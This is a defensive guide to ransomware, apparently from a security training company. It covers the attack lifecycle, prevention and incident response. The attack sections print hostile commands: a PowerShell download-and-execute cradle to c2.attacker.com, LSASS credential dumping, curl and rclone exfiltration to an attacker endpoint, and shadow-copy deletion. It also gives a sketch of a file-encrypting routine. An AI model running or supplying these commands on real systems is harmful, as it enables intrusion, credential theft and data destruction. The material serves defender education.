Ransomware is the most financially damaging category of malware active today. Cybersecurity Ventures estimates global ransomware damages will exceed 265 billion dollars annually by 2031. Hospitals have been forced to divert emergency patients. Pipelines have been shut down. Schools, law firms, and manufacturers have faced weeks of operational disruption. Understanding precisely how ransomware works at a technical level is not optional for anyone responsible for defending infrastructure or advising organisations on security posture.
This guide covers the full lifecycle of a ransomware attack, how modern ransomware families are built and deployed, what defenders can do to prevent infection, and how to respond when prevention fails.
Ransomware is a class of malware that denies access to data or systems and demands payment, typically in cryptocurrency, in exchange for restoring that access. The two dominant mechanisms are encryption-based ransomware, which encrypts files and withholds the decryption key, and locker ransomware, which locks the victim out of their operating system or device without necessarily encrypting files.
Modern ransomware operations have evolved far beyond a simple encrypt-and-demand model. Today's ransomware groups operate as sophisticated criminal enterprises using a Ransomware-as-a-Service (RaaS) model, conduct double extortion by exfiltrating data before encrypting it, and maintain professional negotiation teams, customer support portals, and leak sites on the dark web.
RaaS works exactly as the name implies. A core development team builds and maintains the ransomware payload, the infrastructure, and the payment portal. Affiliates, who may have little technical skill themselves, licence access to the platform and conduct the actual intrusions. Revenue is split, often 70 to 80 percent to the affiliate and the remainder to the core developers.
Groups including LockBit, BlackCat (ALPHV), and Cl0p operated this model at scale. The RaaS model dramatically lowered the technical barrier to conducting ransomware attacks while allowing core developers to scale their reach through a distributed affiliate network.
Every ransomware attack follows a recognisable sequence. Understanding each phase helps defenders place controls at the right points and helps practitioners at Redfox Cybersecurity Academy build realistic lab scenarios for detection and response training.
Ransomware operators gain initial access through several primary vectors:
Exposed RDP remains one of the most common initial access vectors. Scanning for open RDP with masscan or nmap and attempting credential-based access is a standard affiliate tactic:
# Identify hosts with RDP exposed on port 3389
nmap -p 3389 --open -T4 -oG rdp_hosts.txt 10.0.0.0/16
# Parse results for live hosts
grep "3389/open" rdp_hosts.txt | awk '{print $2}' > rdp_targets.txt
[cta]
Once inside, the attacker executes a stager or dropper. Modern ransomware frequently uses living-off-the-land binaries (LOLBins) to avoid detection, abusing legitimate Windows utilities that are already present on the system.
Common execution techniques include:
# Download and execute payload in memory using PowerShell (LOLBin technique)
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://c2.attacker.com/stage2.ps1')"
# Scheduled task persistence (common ransomware persistence mechanism)
schtasks /create /sc onlogon /tn "WindowsUpdateHelper" /tr "C:\ProgramData\svc.exe" /ru SYSTEM /f
[cta]
Defenders should monitor for schtasks, reg add, wmic, and certutil being called by unusual parent processes. These are consistent indicators of ransomware pre-staging activity.
Ransomware is most damaging when it runs with elevated privileges and reaches domain controllers, backup servers, and file shares. Attackers escalate privileges using techniques including token impersonation, Kerberoasting, and exploitation of unpatched local privilege escalation vulnerabilities.
Lateral movement commonly uses:
Credential harvesting at this stage often involves tools like Mimikatz or its variants to extract credentials from LSASS memory:
# Mimikatz credential dump from LSASS (attacker perspective, for detection awareness)
privilege::debug
sekurlsa::logonpasswords
# Dump LSASS via legitimate Windows process (LOLBin evasion)
tasklist /fi "imagename eq lsass.exe"
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <LSASS_PID> C:\ProgramData\lsass.dmp full
[cta]
Security practitioners who want to understand these attack techniques at depth, including how to detect and respond to each stage, can explore the defensive security curriculum at Redfox Cybersecurity Academy.
Before triggering encryption, modern ransomware groups exfiltrate sensitive data. This serves two purposes: it provides additional leverage in negotiations, and it allows the group to monetise even if the victim restores from backup without paying.
Exfiltration tools commonly observed in ransomware incidents include rclone, configured to sync data silently to attacker-controlled cloud storage, and custom exfiltration scripts using curl or wget:
# rclone exfiltration to attacker-controlled cloud (Mega, S3, or similar)
rclone copy /mnt/sensitive_data remote:exfil-bucket --transfers 32 --checkers 16 --no-traverse -q
# Compress and stage data for exfiltration
tar czf /tmp/.data_archive.tar.gz /home /etc /var/www --exclude=*.log
curl -F "file=@/tmp/.data_archive.tar.gz" https://attacker-exfil-endpoint.com/upload
[cta]
Defenders should monitor for rclone installations, unexpected outbound transfers, and large archive creation in unusual directories. rclone configuration files stored at %APPDATA%\rclone\rclone.conf on Windows or ~/.config/rclone/rclone.conf on Linux can reveal exfiltration destinations during incident response.
Before encrypting, ransomware consistently attempts to delete Volume Shadow Copies and disable Windows recovery mechanisms. This is one of the most reliable behavioural indicators of ransomware activity and one of the most damaging actions in the chain.
REM Typical ransomware backup destruction commands
vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
wmic shadowcopy delete
[cta]
Organisations that store backups on systems accessible from the same network segment as production infrastructure are highly vulnerable at this stage. An attacker with domain admin privileges can reach and destroy those backups before the encryption phase begins.
The encryption phase is the most visible part of the attack but actually represents the final stage of a much longer intrusion. By the time files are being encrypted, the attacker has likely been inside the network for hours, days, or in some documented cases, weeks.
Modern ransomware uses hybrid cryptography. A symmetric algorithm, typically AES-256, encrypts the file contents because of its speed. The symmetric key is then encrypted with an asymmetric algorithm, typically RSA-2048 or RSA-4096 or elliptic curve variants, using the attacker's public key. This means decryption is mathematically impossible without the attacker's private key.
A simplified illustration of the logic in Python:
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes, serialization
import os
def encrypt_file(filepath, rsa_public_key):
# Generate a random AES-256 key and IV for this file
aes_key = os.urandom(32)
iv = os.urandom(16)
# Encrypt the file contents with AES-256-CBC
with open(filepath, 'rb') as f:
plaintext = f.read()
cipher = Cipher(algorithms.AES(aes_key), modes.CBC(iv))
encryptor = cipher.encryptor()
# (padding omitted for brevity)
ciphertext = encryptor.update(plaintext) + encryptor.finalize()
# Encrypt the AES key with the attacker's RSA public key
encrypted_key = rsa_public_key.encrypt(
aes_key,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA256(),
label=None
)
)
# Write: encrypted AES key + IV + ciphertext
with open(filepath + '.locked', 'wb') as f:
f.write(len(encrypted_key).to_bytes(4, 'big'))
f.write(encrypted_key)
f.write(iv)
f.write(ciphertext)
os.remove(filepath)
[cta]
This hybrid model is what makes ransomware mathematically robust. The AES key used to encrypt each file is itself encrypted with a key only the attacker controls, making brute force decryption computationally infeasible.
Prevention requires a layered security architecture. No single control stops all ransomware, but well-implemented layers significantly increase the cost and difficulty of a successful attack.
The majority of ransomware incidents begin with an exposed or poorly protected internet-facing service. Start by understanding your external attack surface:
# Enumerate your organisation's internet-exposed services
nmap -sV -p 22,80,443,445,3389,5985,5986,8080,8443 --open your.organisation.ip.range -oN external_exposure.txt
# Check for SMB exposure specifically (a critical ransomware vector)
nmap -p 445 --script smb-security-mode,smb2-security-mode --open target_range
[cta]
Disable RDP on any system where it is not required. Where it must be available, place it behind a VPN with MFA enforced, restrict access to known IP ranges using firewall rules, and enable Network Level Authentication. Consider deploying a privileged access workstation (PAW) architecture for administrative access.
LOLBin abuse and malicious script execution are central to ransomware deployment. Application whitelisting using Windows Defender Application Control (WDAC) or AppLocker restricts which binaries can execute.
Enable PowerShell script block logging to capture full script content for forensic analysis:
# Enable PowerShell script block logging via registry
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" /v EnableScriptBlockLogging /t REG_DWORD /d 1 /f
# Enable module logging
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging" /v EnableModuleLogging /t REG_DWORD /d 1 /f
# Verify logging is active
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
[cta]
Script block logs are written to the Windows event log under Microsoft-Windows-PowerShell/Operational (Event ID 4104). Feed these logs into your SIEM for detection of obfuscated commands, download cradles, and encoded payloads.
Backup integrity is the single most important factor in recovering from ransomware without paying a ransom. Follow the 3-2-1-1-0 backup strategy: three copies of data, on two different media types, with one offsite, one offline or air-gapped, and zero unverified backups (test restores regularly).
Specific hardening steps:
vssadmin and wbadmin execution via WDAC policies or privileged access controls so that only authorised backup processes can modify shadow copies.Signature-based antivirus does not reliably detect modern ransomware, which is often custom-built per campaign or obfuscated to evade known signatures. Endpoint Detection and Response (EDR) platforms provide behavioural telemetry, process tree visibility, and automated response capabilities.
Open-source options for organisations building detection capabilities include Wazuh for host-based telemetry and Velociraptor for endpoint forensics and live response:
# Velociraptor: collect ransomware-relevant artifacts from a live endpoint
velociraptor artifacts collect Windows.Detection.Ransomware --output /evidence/ransomware_hunt/
# Hunt for shadow copy deletion commands in process telemetry
velociraptor artifacts collect Windows.EventLogs.ProcessCreation \
--args CommandLineFilter="vssadmin.*delete|wbadmin.*delete|bcdedit"
[cta]
For teams building detection engineering skills around ransomware behaviour, the hands-on labs at Redfox Cybersecurity Academy provide structured environments to develop and test SIEM rules and EDR detection logic against real-world ransomware TTPs.
Lateral movement is what turns a single infected workstation into an organisation-wide ransomware event. Network segmentation limits blast radius. Implement:
Set-SmbServerConfiguration -EnableSMB1Protocol $false)If ransomware is detected in your environment, the following immediate steps apply.
Isolate affected systems from the network immediately, but do not power them off unless the encryption is actively progressing and you need to stop it. Memory forensics performed on a live system can sometimes recover encryption keys or reveal attacker tooling that is otherwise lost on shutdown.
# Capture volatile memory from a live Linux system for forensic analysis
sudo avml /external_storage/memory_capture.lime
# On Windows, use WinPmem for memory acquisition
winpmem_mini_x64.exe /path/to/output/memory.raw
[cta]
Identifying the ransomware family helps determine whether a decryptor is available. The No More Ransom project (nomoreransom.org), maintained by Europol, INTERPOL, and security vendors, hosts free decryptors for dozens of ransomware families.
Submit a ransom note sample and encrypted file extensions to ID Ransomware (id-ransomware.malwarehunterteam.com) for automated identification.
Before restoring from backups, preserve forensic evidence. This is critical for insurance claims, regulatory notifications, and understanding how the attacker gained access to prevent recurrence.
# Collect key forensic artifacts on a Windows system using KAPE
kape.exe --tsource C: --tdest /evidence/triage_output/ --target KapeTriage --module !EZParser
# Preserve Windows event logs
wevtutil epl Security /evidence/Security.evtx
wevtutil epl System /evidence/System.evtx
wevtutil epl "Microsoft-Windows-PowerShell/Operational" /evidence/PowerShell.evtx
[cta]
Do not pay the ransom without exhausting all alternatives. Payment does not guarantee decryption, does not prevent the attacker from publishing exfiltrated data, and in some jurisdictions may expose the paying organisation to legal liability if the ransomware group is subject to sanctions.
Ransomware is not a single event. It is the final, visible phase of a structured intrusion that may have been in progress for days or weeks before encryption begins. By the time files are locked, the attacker has typically escalated privileges, spread laterally, destroyed backups, and exfiltrated data.
Effective defence requires addressing every phase of the attack chain: reducing internet-exposed attack surface, hardening credentials and authentication, deploying behavioural detection, protecting and isolating backups, and segmenting networks to contain lateral movement.
Recovery capability depends entirely on preparation. Organisations that test their backups regularly, maintain offline copies, and have a documented incident response plan recover faster and without paying ransoms.
If you are developing the technical skills to defend organisations against ransomware, build detection logic for ransomware TTPs, or conduct professional ransomware readiness assessments, the curriculum at Redfox Cybersecurity Academy provides the hands-on, practitioner-level training to get there.
Redfox Cyber Security Inc.
8 The Green, Ste. A, Dover,
Delaware 19901,
United States.
.avif)
